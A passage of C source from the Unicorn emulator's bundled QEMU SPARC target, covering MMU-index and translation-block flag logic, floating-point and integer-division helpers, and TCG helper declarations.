        : (env->lsu & DMMU_E) == 0) {
        return MMU_PHYS_IDX;
    } else if (cpu_hypervisor_mode(env)) {
        return MMU_PHYS_IDX;
    } else if (env->tl > 0) {
        return MMU_NUCLEUS_IDX;
    } else if (cpu_supervisor_mode(env)) {
        return MMU_KERNEL_IDX;
    } else {
        return MMU_USER_IDX;
    }
#endif
}

static inline int cpu_interrupts_enabled(CPUSPARCState *env1)
{
#if !defined (TARGET_SPARC64)
    if (env1->psret != 0)
        return 1;
#else
    if ((env1->pstate & PS_IE) && !cpu_hypervisor_mode(env1)) {
        return 1;
    }
#endif
    return 0;
}

static inline int cpu_pil_allowed(CPUSPARCState *env1, int pil)
{
#if !defined(TARGET_SPARC64)
    /* level 15 is non-maskable on sparc v8 */
    return pil == 15 || pil > env1->psrpil;
#else
    return pil > env1->psrpil;
#endif
}

typedef CPUSPARCState CPUArchState;
typedef SPARCCPU ArchCPU;

#include "exec/cpu-all.h"

#ifdef TARGET_SPARC64
/* sun4u.c */
void cpu_tick_set_count(CPUTimer *timer, uint64_t count);
uint64_t cpu_tick_get_count(CPUTimer *timer);
void cpu_tick_set_limit(CPUTimer *timer, uint64_t limit);
trap_state* cpu_tsptr(CPUSPARCState* env);
#endif

#define TB_FLAG_MMU_MASK 7
#define TB_FLAG_FPU_ENABLED (1 << 4)
#define TB_FLAG_AM_ENABLED (1 << 5)
#define TB_FLAG_SUPER (1 << 6)
#define TB_FLAG_HYPER (1 << 7)
#define TB_FLAG_ASI_SHIFT 24

static inline void cpu_get_tb_cpu_state(CPUSPARCState *env, target_ulong *pc,
                                        target_ulong *cs_base, uint32_t *pflags)
{
    uint32_t flags;

    *pc = env->pc;
    *cs_base = env->npc;
    flags = cpu_mmu_index(env, false);
    if (cpu_supervisor_mode(env)) {
        flags |= TB_FLAG_SUPER;
    }
#ifdef TARGET_SPARC64
    if (env->pstate & PS_AM) {
        flags |= TB_FLAG_AM_ENABLED;
    }
    if ((env->def.features & CPU_FEATURE_FLOAT)
        && (env->pstate & PS_PEF) && (env->fprs & FPRS_FEF)) {
        flags |= TB_FLAG_FPU_ENABLED;
    }
    flags |= env->asi << TB_FLAG_ASI_SHIFT;
#else
    if ((env->def.features & CPU_FEATURE_FLOAT) && env->psref) {
        flags |= TB_FLAG_FPU_ENABLED;
    }
#endif
    *pflags = flags;
}

static inline bool tb_fpu_enabled(int tb_flags)
{
    return tb_flags & TB_FLAG_FPU_ENABLED;
}

static inline bool tb_am_enabled(int tb_flags)
{
#ifndef TARGET_SPARC64
    return false;
#else
    return tb_flags & TB_FLAG_AM_ENABLED;
#endif
}

SPARCCPU *cpu_sparc_init(struct uc_struct *uc);

#endif

unicorn-2.1.1/qemu/target/sparc/fop_helper.c

/*
 * FPU op helpers
 *
 * Copyright (c) 2003-2005 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2
of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" #define QT0 (env->qt0) #define QT1 (env->qt1) static target_ulong do_check_ieee_exceptions(CPUSPARCState *env, uintptr_t ra) { target_ulong status = get_float_exception_flags(&env->fp_status); target_ulong fsr = env->fsr; if (unlikely(status)) { /* Keep exception flags clear for next time. */ set_float_exception_flags(0, &env->fp_status); /* Copy IEEE 754 flags into FSR */ if (status & float_flag_invalid) { fsr |= FSR_NVC; } if (status & float_flag_overflow) { fsr |= FSR_OFC; } if (status & float_flag_underflow) { fsr |= FSR_UFC; } if (status & float_flag_divbyzero) { fsr |= FSR_DZC; } if (status & float_flag_inexact) { fsr |= FSR_NXC; } if ((fsr & FSR_CEXC_MASK) & ((fsr & FSR_TEM_MASK) >> 23)) { CPUState *cs = env_cpu(env); /* Unmasked exception, generate a trap. Note that while the helper is marked as NO_WG, we can get away with writing to cpu state along the exception path, since TCG generated code will never see the write. */ env->fsr = fsr | FSR_FTT_IEEE_EXCP; cs->exception_index = TT_FP_EXCP; cpu_loop_exit_restore(cs, ra); } else { /* Accumulate exceptions */ fsr |= (fsr & FSR_CEXC_MASK) << 5; } } return fsr; } target_ulong helper_check_ieee_exceptions(CPUSPARCState *env) { return do_check_ieee_exceptions(env, GETPC()); } #define F_HELPER(name, p) void helper_f##name##p(CPUSPARCState *env) #define F_BINOP(name) \ float32 helper_f ## name ## s (CPUSPARCState *env, float32 src1, \ float32 src2) \ { \ return float32_ ## name (src1, src2, &env->fp_status); \ } \ float64 helper_f ## name ## d (CPUSPARCState * env, float64 src1,\ float64 src2) \ { \ return float64_ ## name (src1, src2, &env->fp_status); \ } \ F_HELPER(name, q) \ { \ QT0 = float128_ ## name (QT0, QT1, &env->fp_status); \ } F_BINOP(add); F_BINOP(sub); F_BINOP(mul); F_BINOP(div); #undef F_BINOP float64 helper_fsmuld(CPUSPARCState *env, float32 src1, float32 src2) { return float64_mul(float32_to_float64(src1, &env->fp_status), float32_to_float64(src2, &env->fp_status), &env->fp_status); } void helper_fdmulq(CPUSPARCState *env, float64 src1, float64 src2) { QT0 = float128_mul(float64_to_float128(src1, &env->fp_status), float64_to_float128(src2, &env->fp_status), &env->fp_status); } float32 helper_fnegs(float32 src) { return float32_chs(src); } #ifdef TARGET_SPARC64 float64 helper_fnegd(float64 src) { return float64_chs(src); } F_HELPER(neg, q) { QT0 = float128_chs(QT1); } #endif /* Integer to float conversion. 
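 * These all round via env->fp_status, whose rounding mode set_fsr()
 * below keeps in sync with the FSR.RD field.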
*/ float32 helper_fitos(CPUSPARCState *env, int32_t src) { return int32_to_float32(src, &env->fp_status); } float64 helper_fitod(CPUSPARCState *env, int32_t src) { return int32_to_float64(src, &env->fp_status); } void helper_fitoq(CPUSPARCState *env, int32_t src) { QT0 = int32_to_float128(src, &env->fp_status); } #ifdef TARGET_SPARC64 float32 helper_fxtos(CPUSPARCState *env, int64_t src) { return int64_to_float32(src, &env->fp_status); } float64 helper_fxtod(CPUSPARCState *env, int64_t src) { return int64_to_float64(src, &env->fp_status); } void helper_fxtoq(CPUSPARCState *env, int64_t src) { QT0 = int64_to_float128(src, &env->fp_status); } #endif #undef F_HELPER /* floating point conversion */ float32 helper_fdtos(CPUSPARCState *env, float64 src) { return float64_to_float32(src, &env->fp_status); } float64 helper_fstod(CPUSPARCState *env, float32 src) { return float32_to_float64(src, &env->fp_status); } float32 helper_fqtos(CPUSPARCState *env) { return float128_to_float32(QT1, &env->fp_status); } void helper_fstoq(CPUSPARCState *env, float32 src) { QT0 = float32_to_float128(src, &env->fp_status); } float64 helper_fqtod(CPUSPARCState *env) { return float128_to_float64(QT1, &env->fp_status); } void helper_fdtoq(CPUSPARCState *env, float64 src) { QT0 = float64_to_float128(src, &env->fp_status); } /* Float to integer conversion. */ int32_t helper_fstoi(CPUSPARCState *env, float32 src) { return float32_to_int32_round_to_zero(src, &env->fp_status); } int32_t helper_fdtoi(CPUSPARCState *env, float64 src) { return float64_to_int32_round_to_zero(src, &env->fp_status); } int32_t helper_fqtoi(CPUSPARCState *env) { return float128_to_int32_round_to_zero(QT1, &env->fp_status); } #ifdef TARGET_SPARC64 int64_t helper_fstox(CPUSPARCState *env, float32 src) { return float32_to_int64_round_to_zero(src, &env->fp_status); } int64_t helper_fdtox(CPUSPARCState *env, float64 src) { return float64_to_int64_round_to_zero(src, &env->fp_status); } int64_t helper_fqtox(CPUSPARCState *env) { return float128_to_int64_round_to_zero(QT1, &env->fp_status); } #endif float32 helper_fabss(float32 src) { return float32_abs(src); } #ifdef TARGET_SPARC64 float64 helper_fabsd(float64 src) { return float64_abs(src); } void helper_fabsq(CPUSPARCState *env) { QT0 = float128_abs(QT1); } #endif float32 helper_fsqrts(CPUSPARCState *env, float32 src) { return float32_sqrt(src, &env->fp_status); } float64 helper_fsqrtd(CPUSPARCState *env, float64 src) { return float64_sqrt(src, &env->fp_status); } void helper_fsqrtq(CPUSPARCState *env) { QT0 = float128_sqrt(QT1, &env->fp_status); } #define GEN_FCMP(name, size, reg1, reg2, FS, E) \ target_ulong glue(helper_, name) (CPUSPARCState *env) \ { \ int ret; \ target_ulong fsr; \ if (E) { \ ret = glue(size, _compare)(reg1, reg2, &env->fp_status); \ } else { \ ret = glue(size, _compare_quiet)(reg1, reg2, \ &env->fp_status); \ } \ fsr = do_check_ieee_exceptions(env, GETPC()); \ switch (ret) { \ case float_relation_unordered: \ fsr |= (FSR_FCC1 | FSR_FCC0) << FS; \ fsr |= FSR_NVA; \ break; \ case float_relation_less: \ fsr &= ~(FSR_FCC1) << FS; \ fsr |= FSR_FCC0 << FS; \ break; \ case float_relation_greater: \ fsr &= ~(FSR_FCC0) << FS; \ fsr |= FSR_FCC1 << FS; \ break; \ default: \ fsr &= ~((FSR_FCC1 | FSR_FCC0) << FS); \ break; \ } \ return fsr; \ } #define GEN_FCMP_T(name, size, FS, E) \ target_ulong glue(helper_, name)(CPUSPARCState *env, size src1, size src2)\ { \ int ret; \ target_ulong fsr; \ if (E) { \ ret = glue(size, _compare)(src1, src2, &env->fp_status); \ } else { \ ret = glue(size, 
_compare_quiet)(src1, src2, &env->fp_status);        \
        }                                                               \
        fsr = do_check_ieee_exceptions(env, GETPC());                   \
        switch (ret) {                                                  \
        case float_relation_unordered:                                  \
            fsr |= (FSR_FCC1 | FSR_FCC0) << FS;                         \
            break;                                                      \
        case float_relation_less:                                       \
            fsr &= ~(FSR_FCC1 << FS);                                   \
            fsr |= FSR_FCC0 << FS;                                      \
            break;                                                      \
        case float_relation_greater:                                    \
            fsr &= ~(FSR_FCC0 << FS);                                   \
            fsr |= FSR_FCC1 << FS;                                      \
            break;                                                      \
        default:                                                        \
            fsr &= ~((FSR_FCC1 | FSR_FCC0) << FS);                      \
            break;                                                      \
        }                                                               \
        return fsr;                                                     \
    }

GEN_FCMP_T(fcmps, float32, 0, 0);
GEN_FCMP_T(fcmpd, float64, 0, 0);
GEN_FCMP_T(fcmpes, float32, 0, 1);
GEN_FCMP_T(fcmped, float64, 0, 1);
GEN_FCMP(fcmpq, float128, QT0, QT1, 0, 0);
GEN_FCMP(fcmpeq, float128, QT0, QT1, 0, 1);
#ifdef TARGET_SPARC64
GEN_FCMP_T(fcmps_fcc1, float32, 22, 0);
GEN_FCMP_T(fcmpd_fcc1, float64, 22, 0);
GEN_FCMP(fcmpq_fcc1, float128, QT0, QT1, 22, 0);
GEN_FCMP_T(fcmps_fcc2, float32, 24, 0);
GEN_FCMP_T(fcmpd_fcc2, float64, 24, 0);
GEN_FCMP(fcmpq_fcc2, float128, QT0, QT1, 24, 0);
GEN_FCMP_T(fcmps_fcc3, float32, 26, 0);
GEN_FCMP_T(fcmpd_fcc3, float64, 26, 0);
GEN_FCMP(fcmpq_fcc3, float128, QT0, QT1, 26, 0);
GEN_FCMP_T(fcmpes_fcc1, float32, 22, 1);
GEN_FCMP_T(fcmped_fcc1, float64, 22, 1);
GEN_FCMP(fcmpeq_fcc1, float128, QT0, QT1, 22, 1);
GEN_FCMP_T(fcmpes_fcc2, float32, 24, 1);
GEN_FCMP_T(fcmped_fcc2, float64, 24, 1);
GEN_FCMP(fcmpeq_fcc2, float128, QT0, QT1, 24, 1);
GEN_FCMP_T(fcmpes_fcc3, float32, 26, 1);
GEN_FCMP_T(fcmped_fcc3, float64, 26, 1);
GEN_FCMP(fcmpeq_fcc3, float128, QT0, QT1, 26, 1);
#endif
#undef GEN_FCMP_T
#undef GEN_FCMP

static void set_fsr(CPUSPARCState *env, target_ulong fsr)
{
    int rnd_mode;

    switch (fsr & FSR_RD_MASK) {
    case FSR_RD_NEAREST:
        rnd_mode = float_round_nearest_even;
        break;
    default:
    case FSR_RD_ZERO:
        rnd_mode = float_round_to_zero;
        break;
    case FSR_RD_POS:
        rnd_mode = float_round_up;
        break;
    case FSR_RD_NEG:
        rnd_mode = float_round_down;
        break;
    }
    set_float_rounding_mode(rnd_mode, &env->fp_status);
}

target_ulong helper_ldfsr(CPUSPARCState *env, target_ulong old_fsr,
                          uint32_t new_fsr)
{
    old_fsr = (new_fsr & FSR_LDFSR_MASK) | (old_fsr & FSR_LDFSR_OLDMASK);
    set_fsr(env, old_fsr);
    return old_fsr;
}

#ifdef TARGET_SPARC64
target_ulong helper_ldxfsr(CPUSPARCState *env, target_ulong old_fsr,
                           uint64_t new_fsr)
{
    old_fsr = (new_fsr & FSR_LDXFSR_MASK) | (old_fsr & FSR_LDXFSR_OLDMASK);
    set_fsr(env, old_fsr);
    return old_fsr;
}
#endif

unicorn-2.1.1/qemu/target/sparc/helper.c

/*
 * Misc Sparc helpers
 *
 * Copyright (c) 2003-2005 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
* * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" void cpu_raise_exception_ra(CPUSPARCState *env, int tt, uintptr_t ra) { CPUState *cs = env_cpu(env); cs->exception_index = tt; cpu_loop_exit_restore(cs, ra); } void helper_raise_exception(CPUSPARCState *env, int tt) { CPUState *cs = env_cpu(env); cs->exception_index = tt; cpu_loop_exit(cs); } void helper_debug(CPUSPARCState *env) { CPUState *cs = env_cpu(env); cs->exception_index = EXCP_DEBUG; cpu_loop_exit(cs); } #ifdef TARGET_SPARC64 void helper_tick_set_count(void *opaque, uint64_t count) { // cpu_tick_set_count(opaque, count); } uint64_t helper_tick_get_count(CPUSPARCState *env, void *opaque, int mem_idx) { return 0; #if 0 CPUTimer *timer = opaque; if (timer->npt && mem_idx < MMU_KERNEL_IDX) { cpu_raise_exception_ra(env, TT_PRIV_INSN, GETPC()); } return cpu_tick_get_count(timer); #endif } void helper_tick_set_limit(void *opaque, uint64_t limit) { // cpu_tick_set_limit(opaque, limit); } #endif static target_ulong do_udiv(CPUSPARCState *env, target_ulong a, target_ulong b, int cc, uintptr_t ra) { int overflow = 0; uint64_t x0; uint32_t x1; x0 = (a & 0xffffffff) | ((int64_t) (env->y) << 32); x1 = (b & 0xffffffff); if (x1 == 0) { cpu_raise_exception_ra(env, TT_DIV_ZERO, ra); } x0 = x0 / x1; if (x0 > UINT32_MAX) { x0 = UINT32_MAX; overflow = 1; } if (cc) { env->cc_dst = x0; env->cc_src2 = overflow; env->cc_op = CC_OP_DIV; } return x0; } target_ulong helper_udiv(CPUSPARCState *env, target_ulong a, target_ulong b) { return do_udiv(env, a, b, 0, GETPC()); } target_ulong helper_udiv_cc(CPUSPARCState *env, target_ulong a, target_ulong b) { return do_udiv(env, a, b, 1, GETPC()); } static target_ulong do_sdiv(CPUSPARCState *env, target_ulong a, target_ulong b, int cc, uintptr_t ra) { int overflow = 0; int64_t x0; int32_t x1; x0 = (a & 0xffffffff) | ((int64_t) (env->y) << 32); x1 = (b & 0xffffffff); if (x1 == 0) { cpu_raise_exception_ra(env, TT_DIV_ZERO, ra); } else if (x1 == -1 && x0 == INT64_MIN) { x0 = INT32_MAX; overflow = 1; } else { x0 = x0 / x1; if ((int32_t) x0 != x0) { x0 = x0 < 0 ? INT32_MIN : INT32_MAX; overflow = 1; } } if (cc) { env->cc_dst = x0; env->cc_src2 = overflow; env->cc_op = CC_OP_DIV; } return x0; } target_ulong helper_sdiv(CPUSPARCState *env, target_ulong a, target_ulong b) { return do_sdiv(env, a, b, 0, GETPC()); } target_ulong helper_sdiv_cc(CPUSPARCState *env, target_ulong a, target_ulong b) { return do_sdiv(env, a, b, 1, GETPC()); } #ifdef TARGET_SPARC64 int64_t helper_sdivx(CPUSPARCState *env, int64_t a, int64_t b) { if (b == 0) { /* Raise divide by zero trap. */ cpu_raise_exception_ra(env, TT_DIV_ZERO, GETPC()); } else if (b == -1) { /* Avoid overflow trap with i386 divide insn. */ return -a; } else { return a / b; } } uint64_t helper_udivx(CPUSPARCState *env, uint64_t a, uint64_t b) { if (b == 0) { /* Raise divide by zero trap. 
*/ cpu_raise_exception_ra(env, TT_DIV_ZERO, GETPC()); } return a / b; } #endif target_ulong helper_taddcctv(CPUSPARCState *env, target_ulong src1, target_ulong src2) { target_ulong dst; /* Tag overflow occurs if either input has bits 0 or 1 set. */ if ((src1 | src2) & 3) { goto tag_overflow; } dst = src1 + src2; /* Tag overflow occurs if the addition overflows. */ if (~(src1 ^ src2) & (src1 ^ dst) & (1u << 31)) { goto tag_overflow; } /* Only modify the CC after any exceptions have been generated. */ env->cc_op = CC_OP_TADDTV; env->cc_src = src1; env->cc_src2 = src2; env->cc_dst = dst; return dst; tag_overflow: cpu_raise_exception_ra(env, TT_TOVF, GETPC()); } target_ulong helper_tsubcctv(CPUSPARCState *env, target_ulong src1, target_ulong src2) { target_ulong dst; /* Tag overflow occurs if either input has bits 0 or 1 set. */ if ((src1 | src2) & 3) { goto tag_overflow; } dst = src1 - src2; /* Tag overflow occurs if the subtraction overflows. */ if ((src1 ^ src2) & (src1 ^ dst) & (1u << 31)) { goto tag_overflow; } /* Only modify the CC after any exceptions have been generated. */ env->cc_op = CC_OP_TSUBTV; env->cc_src = src1; env->cc_src2 = src2; env->cc_dst = dst; return dst; tag_overflow: cpu_raise_exception_ra(env, TT_TOVF, GETPC()); } #ifndef TARGET_SPARC64 void helper_power_down(CPUSPARCState *env) { CPUState *cs = env_cpu(env); cs->halted = 1; cs->exception_index = EXCP_HLT; env->pc = env->npc; env->npc = env->pc + 4; cpu_loop_exit(cs); } #endif unicorn-2.1.1/qemu/target/sparc/helper.h DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) #ifndef TARGET_SPARC64 DEF_HELPER_1(rett, void, env) DEF_HELPER_2(wrpsr, void, env, tl) DEF_HELPER_1(rdpsr, tl, env) DEF_HELPER_1(power_down, void, env) #else DEF_HELPER_FLAGS_2(wrpil, TCG_CALL_NO_RWG, void, env, tl) DEF_HELPER_2(wrgl, void, env, tl) DEF_HELPER_2(wrpstate, void, env, tl) DEF_HELPER_1(done, void, env) DEF_HELPER_1(retry, void, env) DEF_HELPER_FLAGS_1(flushw, TCG_CALL_NO_WG, void, env) DEF_HELPER_FLAGS_1(saved, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_1(restored, TCG_CALL_NO_RWG, void, env) DEF_HELPER_1(rdccr, tl, env) DEF_HELPER_2(wrccr, void, env, tl) DEF_HELPER_1(rdcwp, tl, env) DEF_HELPER_2(wrcwp, void, env, tl) DEF_HELPER_FLAGS_2(array8, TCG_CALL_NO_RWG_SE, tl, tl, tl) DEF_HELPER_FLAGS_2(set_softint, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_2(clear_softint, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_2(write_softint, TCG_CALL_NO_RWG, void, env, i64) DEF_HELPER_FLAGS_2(tick_set_count, TCG_CALL_NO_RWG, void, ptr, i64) DEF_HELPER_FLAGS_3(tick_get_count, TCG_CALL_NO_WG, i64, env, ptr, int) DEF_HELPER_FLAGS_2(tick_set_limit, TCG_CALL_NO_RWG, void, ptr, i64) #endif DEF_HELPER_FLAGS_3(check_align, TCG_CALL_NO_WG, void, env, tl, i32) DEF_HELPER_1(debug, void, env) 
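/*
 * A brief orientation note for the DEF_HELPER declarations in this file
 * (a summary, not authoritative -- see include/exec/helper-head.h and
 * tcg/tcg.h in this tree for the real definitions).  Each
 * DEF_HELPER_n/DEF_HELPER_FLAGS_n(name, [flags,] ret, args...) line
 * declares helper_<name> so it can be called from TCG-generated code;
 * "tl" stands for target_ulong and "env" for CPUSPARCState *.  The
 * optional flags tell the TCG optimizer what the helper cannot do:
 *   TCG_CALL_NO_WG  - does not write TCG globals (guest CPU state);
 *   TCG_CALL_NO_RWG - neither reads nor writes TCG globals;
 *   *_SE suffix     - no side effects, so the call itself may be
 *                     deleted when its result is unused.
 * Helpers that can trap (udiv, sdiv, taddcctv, ...) are declared without
 * NO_RWG, since a raised exception observes guest state.
 */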
DEF_HELPER_1(save, void, env) DEF_HELPER_1(restore, void, env) DEF_HELPER_3(udiv, tl, env, tl, tl) DEF_HELPER_3(udiv_cc, tl, env, tl, tl) DEF_HELPER_3(sdiv, tl, env, tl, tl) DEF_HELPER_3(sdiv_cc, tl, env, tl, tl) DEF_HELPER_3(taddcctv, tl, env, tl, tl) DEF_HELPER_3(tsubcctv, tl, env, tl, tl) #ifdef TARGET_SPARC64 DEF_HELPER_FLAGS_3(sdivx, TCG_CALL_NO_WG, s64, env, s64, s64) DEF_HELPER_FLAGS_3(udivx, TCG_CALL_NO_WG, i64, env, i64, i64) #endif DEF_HELPER_FLAGS_4(ld_asi, TCG_CALL_NO_WG, i64, env, tl, int, i32) DEF_HELPER_FLAGS_5(st_asi, TCG_CALL_NO_WG, void, env, tl, i64, int, i32) DEF_HELPER_FLAGS_1(check_ieee_exceptions, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_3(ldfsr, TCG_CALL_NO_RWG, tl, env, tl, i32) DEF_HELPER_FLAGS_1(fabss, TCG_CALL_NO_RWG_SE, f32, f32) DEF_HELPER_FLAGS_2(fsqrts, TCG_CALL_NO_RWG, f32, env, f32) DEF_HELPER_FLAGS_2(fsqrtd, TCG_CALL_NO_RWG, f64, env, f64) DEF_HELPER_FLAGS_3(fcmps, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmpd, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_3(fcmpes, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmped, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_1(fsqrtq, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_1(fcmpq, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_1(fcmpeq, TCG_CALL_NO_WG, tl, env) #ifdef TARGET_SPARC64 DEF_HELPER_FLAGS_3(ldxfsr, TCG_CALL_NO_RWG, tl, env, tl, i64) DEF_HELPER_FLAGS_1(fabsd, TCG_CALL_NO_RWG_SE, f64, f64) DEF_HELPER_FLAGS_3(fcmps_fcc1, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmps_fcc2, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmps_fcc3, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmpd_fcc1, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_3(fcmpd_fcc2, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_3(fcmpd_fcc3, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_3(fcmpes_fcc1, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmpes_fcc2, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmpes_fcc3, TCG_CALL_NO_WG, tl, env, f32, f32) DEF_HELPER_FLAGS_3(fcmped_fcc1, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_3(fcmped_fcc2, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_3(fcmped_fcc3, TCG_CALL_NO_WG, tl, env, f64, f64) DEF_HELPER_FLAGS_1(fabsq, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_1(fcmpq_fcc1, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_1(fcmpq_fcc2, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_1(fcmpq_fcc3, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_1(fcmpeq_fcc1, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_1(fcmpeq_fcc2, TCG_CALL_NO_WG, tl, env) DEF_HELPER_FLAGS_1(fcmpeq_fcc3, TCG_CALL_NO_WG, tl, env) #endif DEF_HELPER_2(raise_exception, noreturn, env, int) #define F_HELPER_0_1(name) \ DEF_HELPER_FLAGS_1(f ## name, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_3(faddd, TCG_CALL_NO_RWG, f64, env, f64, f64) DEF_HELPER_FLAGS_3(fsubd, TCG_CALL_NO_RWG, f64, env, f64, f64) DEF_HELPER_FLAGS_3(fmuld, TCG_CALL_NO_RWG, f64, env, f64, f64) DEF_HELPER_FLAGS_3(fdivd, TCG_CALL_NO_RWG, f64, env, f64, f64) F_HELPER_0_1(addq) F_HELPER_0_1(subq) F_HELPER_0_1(mulq) F_HELPER_0_1(divq) DEF_HELPER_FLAGS_3(fadds, TCG_CALL_NO_RWG, f32, env, f32, f32) DEF_HELPER_FLAGS_3(fsubs, TCG_CALL_NO_RWG, f32, env, f32, f32) DEF_HELPER_FLAGS_3(fmuls, TCG_CALL_NO_RWG, f32, env, f32, f32) DEF_HELPER_FLAGS_3(fdivs, TCG_CALL_NO_RWG, f32, env, f32, f32) DEF_HELPER_FLAGS_3(fsmuld, TCG_CALL_NO_RWG, f64, env, f32, f32) DEF_HELPER_FLAGS_3(fdmulq, TCG_CALL_NO_RWG, void, env, f64, f64) DEF_HELPER_FLAGS_1(fnegs, TCG_CALL_NO_RWG_SE, f32, f32) 
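/*
 * Why the flags differ among the int-to-float conversion helpers that
 * follow (an observation about this file, not upstream documentation):
 * fitod may carry the *_SE flag because an int32 -> float64 conversion
 * is always exact and raises no IEEE exception, so dropping an unused
 * call loses nothing.  fitos can set the inexact flag in env->fp_status
 * (int32 -> float32 can be inexact once values exceed 2^24), and fitoq
 * writes the QT0 quad register held in env, so neither of those is
 * marked side-effect free.
 */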
DEF_HELPER_FLAGS_2(fitod, TCG_CALL_NO_RWG_SE, f64, env, s32) DEF_HELPER_FLAGS_2(fitoq, TCG_CALL_NO_RWG, void, env, s32) DEF_HELPER_FLAGS_2(fitos, TCG_CALL_NO_RWG, f32, env, s32) #ifdef TARGET_SPARC64 DEF_HELPER_FLAGS_1(fnegd, TCG_CALL_NO_RWG_SE, f64, f64) DEF_HELPER_FLAGS_1(fnegq, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_2(fxtos, TCG_CALL_NO_RWG, f32, env, s64) DEF_HELPER_FLAGS_2(fxtod, TCG_CALL_NO_RWG, f64, env, s64) DEF_HELPER_FLAGS_2(fxtoq, TCG_CALL_NO_RWG, void, env, s64) #endif DEF_HELPER_FLAGS_2(fdtos, TCG_CALL_NO_RWG, f32, env, f64) DEF_HELPER_FLAGS_2(fstod, TCG_CALL_NO_RWG, f64, env, f32) DEF_HELPER_FLAGS_1(fqtos, TCG_CALL_NO_RWG, f32, env) DEF_HELPER_FLAGS_2(fstoq, TCG_CALL_NO_RWG, void, env, f32) DEF_HELPER_FLAGS_1(fqtod, TCG_CALL_NO_RWG, f64, env) DEF_HELPER_FLAGS_2(fdtoq, TCG_CALL_NO_RWG, void, env, f64) DEF_HELPER_FLAGS_2(fstoi, TCG_CALL_NO_RWG, s32, env, f32) DEF_HELPER_FLAGS_2(fdtoi, TCG_CALL_NO_RWG, s32, env, f64) DEF_HELPER_FLAGS_1(fqtoi, TCG_CALL_NO_RWG, s32, env) #ifdef TARGET_SPARC64 DEF_HELPER_FLAGS_2(fstox, TCG_CALL_NO_RWG, s64, env, f32) DEF_HELPER_FLAGS_2(fdtox, TCG_CALL_NO_RWG, s64, env, f64) DEF_HELPER_FLAGS_1(fqtox, TCG_CALL_NO_RWG, s64, env) DEF_HELPER_FLAGS_2(fpmerge, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmul8x16, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmul8x16al, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmul8x16au, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmul8sux16, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmul8ulx16, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmuld8sux16, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fmuld8ulx16, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(fexpand, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_3(pdist, TCG_CALL_NO_RWG_SE, i64, i64, i64, i64) DEF_HELPER_FLAGS_2(fpack16, TCG_CALL_NO_RWG_SE, i32, i64, i64) DEF_HELPER_FLAGS_3(fpack32, TCG_CALL_NO_RWG_SE, i64, i64, i64, i64) DEF_HELPER_FLAGS_2(fpackfix, TCG_CALL_NO_RWG_SE, i32, i64, i64) DEF_HELPER_FLAGS_3(bshuffle, TCG_CALL_NO_RWG_SE, i64, i64, i64, i64) #define 